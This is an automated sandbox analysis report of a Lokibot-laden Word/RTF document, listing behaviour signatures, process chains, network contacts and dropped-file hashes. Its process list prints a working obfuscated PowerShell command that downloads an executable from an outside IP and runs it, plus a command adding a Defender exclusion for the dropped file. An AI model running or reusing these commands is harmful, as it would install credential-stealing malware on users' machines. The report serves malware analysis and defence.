Analysis Overview
SHA256
564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
Threat Level: Known bad
The file 564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.doc was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Evasion via Device Credential Deployment
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
outlook_win_path
Suspicious behavior: AddClipboardFormatListener
outlook_office_path
Launches Equation Editor
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 05:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 05:02
Reported
2024-11-21 05:05
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2576 set thread context of 964 | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | C:\Users\Admin\AppData\Roaming\wininit.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\wininit.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf"
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Users\Admin\AppData\Roaming\wininit.exe
"C:\Users\Admin\AppData\Roaming\wininit.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
C:\Users\Admin\AppData\Roaming\wininit.exe
"C:\Users\Admin\AppData\Roaming\wininit.exe"
C:\Users\Admin\AppData\Roaming\wininit.exe
"C:\Users\Admin\AppData\Roaming\wininit.exe"
C:\Users\Admin\AppData\Roaming\wininit.exe
"C:\Users\Admin\AppData\Roaming\wininit.exe"
Network
| Country | Destination | Domain | Proto |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
memory/2512-0-0x000000002F981000-0x000000002F982000-memory.dmp
memory/2512-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2512-2-0x00000000710FD000-0x0000000071108000-memory.dmp
C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta
| MD5 | ec0d423a3f72d69975a1e31a275f5377 |
| SHA1 | 213922fb8456ecaadc24889afec1ac6ef5010c68 |
| SHA256 | 9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac |
| SHA512 | 8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | a34ac71400d222f400e4f0a1aa3b7e24 |
| SHA1 | e10eb1a6b583805012d6b32e48ed7583f28924af |
| SHA256 | eb7f05c333b827a314fd3967613890e68338dedd3db7a9dccf97ee7217be41b1 |
| SHA512 | 0baa4cd30c091dfc81987ccbba4262cabd6f2bebd23a11bf033245d093ad9f08236fcc6e5bf377f7ed1447b44dfbf75de75540dea0519f9c3f234e2877ae48bf |
\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.cmdline
| MD5 | 03cc27246d73effddabcde0c807b3ca0 |
| SHA1 | 8f32dc674e23ad6ab55fa0434c79f11eb3e3b95e |
| SHA256 | b90f9b503065cd1bc445cfcb568cac7f3015b25fff1b9bd5a509ca29f7abaca6 |
| SHA512 | 1a64ef59acc448c8bda48f92bdcc93a133a3e609afe5933f2104248e8c2964ede6ee99d4d965ca0f17365d53ed15d53e97a2de1be68437e0305863f7e0eb84a2 |
\??\c:\Users\Admin\AppData\Local\Temp\xgmcc-rp.0.cs
| MD5 | b0517586f4097114e790c61f2685f0d5 |
| SHA1 | 20f7482298ab96731228ebd5242ceddfd72ff50f |
| SHA256 | a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237 |
| SHA512 | c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCEF2F.tmp
| MD5 | a99eb9ea198acaedd5077eed8303179a |
| SHA1 | d394d42b44edca1fe0d5ec37f7d214f41d0df184 |
| SHA256 | d5aed99214eb726589da2e693c0e5d3d9dcef4c875c310327672ca04d9e79cdc |
| SHA512 | 4eaefef8756bab8364bdbc081066d7e172fb043f4001d221c796564dd7d4b1f217f1d3373470bad71717656c1cc46645a4d4c1a2ebc263133ec0def71030ffad |
C:\Users\Admin\AppData\Local\Temp\RESEF30.tmp
| MD5 | 263725a648fa08c47ff7e93f6ae6d9c0 |
| SHA1 | ee2c49bfe3c908be90f840a82d55d572e0796d22 |
| SHA256 | 033ea33d1de91319919c2fe2bbeb7e26e9fc737a361f0bf1cb82e5800b29dae8 |
| SHA512 | 62d0a5030f61206cdf3cc7114d10fa6f9eb31489cb06e3db170b424eb97b1f7566363ba9e25b2164e54113c91f5bee23715230a78e72d4c92a8b24827678a3a9 |
C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.dll
| MD5 | c5f00bb6591de7e8babb742aa2484bc5 |
| SHA1 | 82c7f4061ae27f8aaedf321abc5cafaef0d62ce5 |
| SHA256 | b9a7fedec9b243cc52623cf2a0d2c40666b06070122ab8f972e1cddde381c53f |
| SHA512 | 4881d72b592f6bd127fa5b11e8baa31fd17213051460ea91f2a72723332aec0a9f2a0fd7dfec6a99d76a0437f1f94ed1618b0dabf212462bbf1c8518c854aabb |
C:\Users\Admin\AppData\Local\Temp\xgmcc-rp.pdb
| MD5 | 5c91fa3698eaa494e7bdeff3900f498d |
| SHA1 | 1771bf5cf61301c1202fc69fc7c9cb1cb062cc46 |
| SHA256 | d7acde1a4c82c2541f3135f760d937280df2247dbabf89928c70785b73c2944c |
| SHA512 | 32c228aed04738ffeff1ce0dfcf8332c2e4256e4c4863fcc105528460a4016c894eaac0b5def24dd75b44d659daaf706dbe318d98f60c946618dc21510013eab |
memory/2512-42-0x00000000710FD000-0x0000000071108000-memory.dmp
C:\Users\Admin\AppData\Roaming\wininit.exe
| MD5 | 66b03d1aff27d81e62b53fc108806211 |
| SHA1 | 2557ec8b32d0b42cac9cabde199d31c5d4e40041 |
| SHA256 | 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4 |
| SHA512 | 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d |
memory/2576-56-0x0000000000890000-0x0000000000928000-memory.dmp
memory/2576-57-0x0000000000320000-0x0000000000332000-memory.dmp
memory/2576-58-0x0000000004510000-0x0000000004574000-memory.dmp
memory/964-61-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-72-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-71-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/964-69-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-67-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-74-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-65-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-63-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1488793075-819845221-1497111674-1000\0f5007522459c86e95ffcc62f32308f1_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/964-98-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/964-107-0x0000000000400000-0x00000000004A2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 05:02
Reported
2024-11-21 05:05
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
141s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1.rtf" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 92.123.26.217:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.143:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 217.26.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.252.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/4700-1-0x00007FFAE70ED000-0x00007FFAE70EE000-memory.dmp
memory/4700-3-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp
memory/4700-2-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp
memory/4700-0-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp
memory/4700-6-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
memory/4700-5-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
memory/4700-4-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp
memory/4700-7-0x00007FFAA70D0000-0x00007FFAA70E0000-memory.dmp
memory/4700-9-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
memory/4700-10-0x00007FFAA4F20000-0x00007FFAA4F30000-memory.dmp
memory/4700-8-0x00007FFAE7050000-0x00007FFAE7245000-memory.dmp
